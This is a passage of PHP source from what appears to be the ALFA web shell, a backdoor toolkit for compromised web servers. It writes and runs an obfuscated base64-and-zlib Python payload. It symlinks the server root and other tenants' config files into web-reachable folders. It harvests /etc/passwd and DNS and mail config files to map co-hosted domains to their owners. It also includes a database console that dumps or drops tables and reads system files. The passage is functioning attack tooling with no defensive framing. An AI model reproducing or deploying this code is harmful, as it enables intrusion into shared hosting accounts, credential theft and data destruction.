  4747.     $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
  4748.     $cginame = "symperl.alfa";
  4749.     $source = $perl;
  4750.     $lang = "perl";
  4751.     if($_POST["alfa2"]=="sympy"){
  4752.         $cginame = "pysymlink.alfa";
  4753.         $source = $py;
  4754.         $lang = "python";
  4755.     }
  4756.     @__write_file($cginame,$source);
  4757.     @chmod($cginame,0755);
  4758.     echo __pre();
  4759.     $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
  4760.     if(strlen($resource) == 0){
  4761.         echo AlfaiFrameCreator('cgialfa/'.$cginame);
  4762.     }else{
  4763.         echo $resource;
  4764.     }
  4765. }
  4766. if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
  4767. if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
  4768. AlfaNum(9,10);
  4769. echo __pre().'
  4770. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
  4771. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
  4772. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
  4773. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
  4774. $path = $_POST['alfa5'];
  4775. $symname = $_POST['alfa6'];
  4776. $solevisible58 = $_POST['alfa7'];
  4777. if($solevisible58){
  4778. $new_name = str_replace(".", "_", basename($symname));
  4779. $rand_dir = $new_name.rand(111,9999);
  4780. $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
  4781. @mkdir($sym_dir, 0777, true);
  4782. alfacgihtaccess('sym', $sym_dir, $symname);
  4783. _alfa_symlink("$path","$sym_dir/$symname");
  4784. echo __pre();
  4785. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
  4786. }
  4787. }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
  4788. }
  4789. if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
  4790. $cant_symlink = true;
  4791. if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
  4792. @mkdir('alfasymlink',0777);
  4793. alfacgihtaccess('sym','alfasymlink/');
  4794. _alfa_symlink('/','alfasymlink/root');
  4795. $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
  4796. if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
  4797. echo "<center>";
  4798. $lines = array();
  4799. $anony_domains = array();
  4800. $anonymous_users = array();
  4801. $f_black = array();
  4802. $error = false;
  4803. $anonymous = false;
  4804. $makepwd = "/home/{user}/public_html/";
  4805. $domains = alfaGetDomains();
  4806. $lines = $domains["lines"];
  4807. $state = $domains["state"];
  4808. $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
  4809. $can_runcmd = _alfa_can_runCommand(false,false);
  4810. if(!$is_posix && !$can_runcmd){
  4811.     $anonymous = true;
  4812.     $anony_domains = $domains["lines"];
  4813.     $lines = _alfa_file('/etc/passwd');
  4814. }
  4815. echo $table_header;
  4816. $count=1;
  4817. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4818. foreach($lines as $line){
  4819.     $domain = "";
  4820.     $owner = "";
  4821.     if($anonymous){
  4822.         $explode = explode(":", $line);
  4823.         $owner = $explode[0];
  4824.         $owner_len = strlen($owner) - 1;
  4825.         $userid = $explode[2];
  4826.         if((int)$userid < 500)continue;
  4827.         $domain = "[?????]";
  4828.         $temp_black = array();
  4829.         $finded = false;
  4830.         foreach($anony_domains as $anony){
  4831.             if($state == "named.conf"){
  4832.                 if(@strstr($anony, 'zone')){
  4833.                     preg_match_all('#zone "(.*)"#',$anony, $data);
  4834.                     $domain = $data[1][0];
  4835.                 }else{
  4836.                     continue;
  4837.                 }
  4838.             }elseif($state == "named" || $state == "valiases"){
  4839.                 if($anony == "." || $anony == "..")continue;
  4840.                 if($state == "named")$anony = rtrim($anony, ".db");
  4841.                 $domain = $anony;
  4842.             }
  4843.             $sub_domain = str_replace(array("-","."), "", $domain);
  4844.             if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
  4845.                 if(in_array($owner.$domain, $temp_black))continue;
  4846.                 $sympath = str_replace("{user}", $owner, $makepwd);
  4847.                 $http = "http://".$domain;
  4848.                 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4849.                 $count++;
  4850.                 $temp_black[] = $owner.$domain;
  4851.                 $finded = true;
  4852.             }
  4853.         }
  4854.         if(!$finded){
  4855.             $anonymous_users[] = $owner;
  4856.         }
  4857.     }else{
  4858.         if($state == "named.conf"){
  4859.             if(@strstr($line, 'zone')){
  4860.                 preg_match_all('#zone "(.*)"#',$line, $data);
  4861.                 $domain = $data[1][0];
  4862.             }else{
  4863.                 continue;
  4864.             }
  4865.         }elseif($state == "named" || $state == "valiases"){
  4866.             if($line == "." || $line == "..")continue;
  4867.             if($state == "named")$line = rtrim($line, ".db");
  4868.             $domain = $line;
  4869.         }
  4870.         if(strlen(trim($domain)) > 2 && $state != "passwd"){
  4871.             if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
  4872.             if($is_posix){
  4873.                 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
  4874.                 $owner = $user["name"];
  4875.             }elseif($can_runcmd){
  4876.                 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
  4877.             }
  4878.         }
  4879.     }
  4880.     if(!$anonymous){
  4881.         if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
  4882.         $sympath = str_replace("{user}", $owner, $makepwd);
  4883.         $http = "http://".$domain;
  4884.         if($state == "passwd"){
  4885.             $http = "javascript:alert('we cant find domain...')";
  4886.         }
  4887.         echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4888.         $count++;
  4889.         $f_black[] = $owner.$domain;
  4890.     }
  4891. }
  4892. if($anonymous){
  4893.     foreach($anonymous_users as $owner){
  4894.         $sympath = str_replace("{user}", $owner, $makepwd);
  4895.         $http = "javascript:alert('we cant find domain...')";
  4896.         echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
  4897.         $count++;
  4898.     }
  4899. }
  4900. $cant_symlink = false;
  4901. }else{
  4902. $is_direct = false;
  4903. $makepwd = alfaMakePwd();
  4904. if(_alfa_file_exists("/etc/virtual/domainowners")){
  4905.     $makepwd = "/home/{user}/public_html";
  4906.     $is_direct = true;
  4907. }
  4908. $sole = _alfa_file("/etc/virtual/domainowners");
  4909. $count=1;
  4910. echo $table_header;
  4911. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4912. if($sole){
  4913.     foreach($sole as $visible){
  4914.         if(@strstr($visible,":")){
  4915.             $solevisible = explode(':', $visible);
  4916.             $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
  4917.             echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
  4918.         }
  4919.     }
  4920. }else{
  4921.     $passwd = _alfa_file("/etc/passwd");
  4922.     if($passwd){
  4923.         $html = "";
  4924.         $is_named = false;
  4925.         $users = array();
  4926.         $domains = array();
  4927.         $uknowns = array();
  4928.         foreach($passwd as $user){
  4929.             $user = trim($user);
  4930.             $expl = explode(":", $user);
  4931.             if((int)$expl[2] < 500)continue;
  4932.             $users[$expl[0]] = $expl[5];
  4933.         }
  4934.         $site_domains = @scandir("/etc/virtual/");
  4935.         if(!$site_domains){
  4936.             $site_domains = alfaEx("ls /etc/virtual/");
  4937.             $site_domains = explode("\n", $site_domains);
  4938.             if(!$site_domains){
  4939.                 $site_domains = _alfa_file("/etc/named.conf");
  4940.                 if($site_domains){$is_named = true;}
  4941.             }
  4942.         }
  4943.         foreach($site_domains as $line){
  4944.             if($is_named){
  4945.                 if(@strstr($line, 'zone')){
  4946.                     preg_match_all('#zone "(.*)"#',$line, $data);
  4947.                     $domain = $data[1][0];
  4948.                     if(strlen($domain  > 2) && !empty($domain)){
  4949.                         $domains[] = $domain;
  4950.                     }
  4951.                 }
  4952.             }else{
  4953.                 $domains[] = $line;
  4954.             }
  4955.         }
  4956.         $x = 1;
  4957.         foreach($users as $user => $home){
  4958.             foreach($domains as $domain){
  4959.                 $user_len = strlen($user) - 1;
  4960.                 $sub_domain = str_replace(array("-","."), "", $domain);
  4961.                 $five_user = substr($user, 0,$user_len);
  4962.                 $five_domain = substr($sub_domain, 0,$user_len);
  4963.                 if($five_user == $five_domain){
  4964.                     if($is_direct){
  4965.                         $cwd = str_replace("{user}", $user, $makepwd);
  4966.                     }else{
  4967.                         $expl = explode("}/", $makepwd);
  4968.                         $cwd = $home."/".$expl[1];
  4969.                     }
  4970.                     $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
  4971.                 }else{
  4972.                     $uknowns[$user] = $home;
  4973.                 }
  4974.             }
  4975.         }
  4976.         $uknowns = array_unique($uknowns);
  4977.         foreach($uknowns as $user => $home){
  4978.             if($is_direct){
  4979.                 $cwd = str_replace("{user}", $user, $makepwd);
  4980.             }else{
  4981.                 $expl = explode("}/", $makepwd);
  4982.                 $cwd = $home."/".$expl[1];
  4983.             }
  4984.             $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
  4985.         }
  4986.         echo($html);
  4987.     }
  4988. }
  4989. echo "</table>";
  4990. $cant_symlink = false;
  4991. }
  4992. }else{
  4993.     echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
  4994.     $cant_symlink = false;
  4995. }
  4996. if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
  4997. echo "</center></table>";
  4998. }
  4999. echo "</div>";
  5000. alfafooter();
  5001. }
  5002. function alfasql(){
  5003. if(!isset($_POST['sql_host'])){
  5004. $_POST['sql_host'] = $_SESSION["sql_host"];
  5005. $_POST['sql_login'] = $_SESSION["sql_login"];
  5006. $_POST['sql_pass'] = $_SESSION["sql_pass"];
  5007. $_POST['sql_base'] = $_SESSION["sql_base"];
  5008. }
  5009. class DbClass{
  5010. public $type;
  5011. public $link;
  5012. public $res;
  5013. function __construct($type){
  5014. $this->type = $type;
  5015. }
  5016. function connect($host, $user, $pass, $dbname){
  5017. switch($this->type){
  5018. case 'mysql':
  5019. if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
  5020. break;
  5021. case 'pgsql':
  5022. $host = explode(':', $host);
  5023. if(!$host[1]) $host[1]=5432;
  5024. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  5025. break;
  5026. }
  5027. return false;
  5028. }
  5029. function selectdb($db){
  5030. switch($this->type){
  5031. case 'mysql':
  5032. if(@mysqli_select_db($db))return true;
  5033. break;
  5034. }
  5035. return false;
  5036. }
  5037. function query($str){
  5038. switch($this->type){
  5039. case 'mysql':
  5040. return $this->res = @mysqli_query($this->link,$str);
  5041. break;
  5042. case 'pgsql':
  5043. return $this->res = @pg_query($this->link,$str);
  5044. break;
  5045. }
  5046. return false;
  5047. }
  5048. function fetch(){
  5049. $res = func_num_args()?func_get_arg(0):$this->res;
  5050. switch($this->type){
  5051. case 'mysql':
  5052. return @mysqli_fetch_assoc($res);
  5053. break;
  5054. case 'pgsql':
  5055. return @pg_fetch_assoc($res);
  5056. break;
  5057. }
  5058. return false;
  5059. }
  5060. function listDbs(){
  5061. switch($this->type){
  5062. case 'mysql':
  5063. return $this->query("SHOW databases");
  5064. break;
  5065. case 'pgsql':
  5066. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  5067. break;
  5068. }
  5069. return false;
  5070. }
  5071. function listTables(){
  5072. switch($this->type){
  5073. case 'mysql':
  5074. return $this->res = $this->query('SHOW TABLES');
  5075. break;
  5076. case 'pgsql':
  5077. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  5078. break;
  5079. }
  5080. return false;
  5081. }
  5082. function error(){
  5083. switch($this->type){
  5084. case 'mysql':
  5085. return @mysqli_error($this->link);
  5086. break;
  5087. case 'pgsql':
  5088. return @pg_last_error();
  5089. break;
  5090. }
  5091. return false;
  5092. }
  5093. function setCharset($str){
  5094. switch($this->type){
  5095. case 'mysql':
  5096. if(function_exists('mysql_set_charset'))
  5097. return @mysqli_set_charset($this->link,$str);
  5098. else
  5099. $this->query('SET CHARSET '.$str);
  5100. break;
  5101. case 'pgsql':
  5102. return @pg_set_client_encoding($this->link, $str);
  5103. break;
  5104. }
  5105. return false;
  5106. }
  5107. function loadFile($str){
  5108. switch($this->type){
  5109. case 'mysql':
  5110. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  5111. break;
  5112. case 'pgsql':
  5113. $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
  5114. $r=array();
  5115. while($i=$this->fetch())
  5116. $r[] = $i['file'];
  5117. $this->query('drop table solevisible');
  5118. return array('file'=>implode("\n",$r));
  5119. break;
  5120. }
  5121. return false;
  5122. }
  5123. function dump($table, $fp = false){
  5124. switch($this->type){
  5125. case 'mysql':
  5126. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  5127. $create = mysqli_fetch_array($res);
  5128. $sql = $create[1].";\n";
  5129. if($fp) fwrite($fp, $sql); else echo($sql);
  5130. $this->query('SELECT * FROM `'.$table.'`');
  5131. $head = true;
  5132. while($item = $this->fetch()){
  5133. $columns = array();
  5134. foreach($item as $k=>$v) {
  5135. if($v == null)
  5136. $item[$k] = "''";
  5137. elseif(is_numeric($v))
  5138. $item[$k] = $v;
  5139. else
  5140. $item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
  5141. $columns[] = "`".$k."`";
  5142. }
  5143. if($head) {
  5144. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
  5145. $head = false;
  5146. } else
  5147. $sql = "\n\t,(".implode(", ", $item).')';
  5148. if($fp) fwrite($fp, $sql); else echo($sql);
  5149. }
  5150. if(!$head)
  5151. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  5152. break;
  5153. case 'pgsql':
  5154. $this->query('SELECT * FROM '.$table);
  5155. while($item = $this->fetch()) {
  5156. $columns = array();
  5157. foreach($item as $k=>$v) {
  5158. $item[$k] = "'".addslashes($v)."'";
  5159. $columns[] = $k;
  5160. }
  5161. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  5162. if($fp) fwrite($fp, $sql); else echo($sql);
  5163. }
  5164. break;
  5165. }
  5166. return false;
  5167. }
  5168. };
  5169. $db = new DbClass($_POST['type']);
  5170. if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
  5171. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  5172. $db->selectdb($_POST['sql_base']);
  5173. switch($_POST['charset']){
  5174. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5175. case "UTF-8": $db->setCharset('utf8'); break;
  5176. case "KOI8-R": $db->setCharset('koi8r'); break;
  5177. case "KOI8-U": $db->setCharset('koi8u'); break;
  5178. case "calfa866": $db->setCharset('calfa866'); break;
  5179. }
  5180. $json = json_decode($_POST['alfa2'],true);
  5181. if(count($json['tbl'])>0){
  5182. if($_POST['alfa1']=='dumpfile'){
  5183. if($fp = @fopen($json['file'],'w')){
  5184. foreach($json['tbl'] as $v)$db->dump($v, $fp);
  5185. fclose($fp);
  5186. $dumpStatus = true;
  5187. }}else{
  5188. foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
  5189. }
  5190. }
  5191. unset($_POST['alfa2']);
  5192. }
  5193. alfahead();
  5194. echo "
  5195. <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
  5196. <form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
  5197. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
  5198. <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
  5199. <td><select name='type'><option value='mysql' ";
  5200. if(@$_POST['type']=='mysql')echo 'selected';
  5201. echo ">MySql</option><option value='pgsql' ";
  5202. if(@$_POST['type']=='pgsql')echo 'selected';
  5203. echo ">PostgreSql</option></select></td>
  5204. <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
  5205. <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
  5206. <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  5207. $tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
  5208. if(isset($_POST['sql_host'])){
  5209. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  5210. $_SESSION["sql_host"] = $_POST['sql_host'];
  5211. $_SESSION["sql_login"] = $_POST['sql_login'];
  5212. $_SESSION["sql_pass"] = $_POST['sql_pass'];
  5213. $_SESSION["sql_base"] = $_POST['sql_base'];
  5214. switch($_POST['charset']){
  5215. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5216. case "UTF-8": $db->setCharset('utf8'); break;
  5217. case "KOI8-R": $db->setCharset('koi8r'); break;
  5218. case "KOI8-U": $db->setCharset('koi8u'); break;
  5219. case "calfa866": $db->setCharset('calfa866'); break;
  5220. }
  5221. $db->setCharset('utf8');
  5222. $db->listDbs();
  5223. echo "<select name=sql_base><option value=''></option>";
  5224. while($item = $db->fetch()) {
  5225. list($key, $value) = each($item);
  5226. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  5227. }
  5228. echo '</select>';
  5229. }
  5230. else echo $tmp;
  5231. }else
  5232. echo $tmp;
  5233. echo "</td>
  5234. <td><input type='submit' value=' '></td>
  5235. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
  5236. </tr>
  5237. </table>
  5238. <script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
  5239. ";
  5240. if(isset($db) && $db->link){
  5241. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  5242. if(!empty($_POST['sql_base'])){
  5243. $db->selectdb($_POST['sql_base']);
  5244. echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
  5245. $tbls_res = $db->listTables();
  5246. while($item = $db->fetch($tbls_res)){
  5247. list($key, $value) = each($item);
  5248. if(!empty($_POST['sql_count']))
  5249. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
  5250. $value = htmlspecialchars($value);
  5251. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
  5252. }
  5253. echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
  5254. if(@$_POST['alfa1'] == 'select'){
  5255. $_POST['alfa1'] = 'query';
  5256. $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
  5257. $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
  5258. $num = $db->fetch();
  5259. $pages = ceil($num['n'] / 30);
  5260. echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
  5261. echo " of $pages";
  5262. if($_POST['alfa3'] > 1)
  5263. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt; Prev</a>";
  5264. if($_POST['alfa3'] < $pages)
  5265. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;</a>";
  5266. $_POST['alfa3']--;
  5267. $cache_table = $_POST['alfa2'];
  5268. if($_POST['type']=='pgsql')
  5269. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
  5270. else
  5271. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
  5272. echo "<br><br>";
  5273. }
  5274. if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
  5275. $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
  5276. $db->query(@$_POST['alfa2']);
  5277. if($db->res !== false){
  5278. $title = false;
  5279. echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
  5280. $line = 1;
  5281. while($item = $db->fetch()) {
  5282. if(!$title){
  5283. echo '<tr><th>#</th>';
  5284. foreach($item as $key => $value){
  5285. echo '<th>'.$key.'</th>';
  5286. }
  5287. reset($item);
  5288. $title=true;
  5289. echo '</tr><tr>';
  5290. $line = 2;
  5291. }
  5292. if($cache_table!=''){
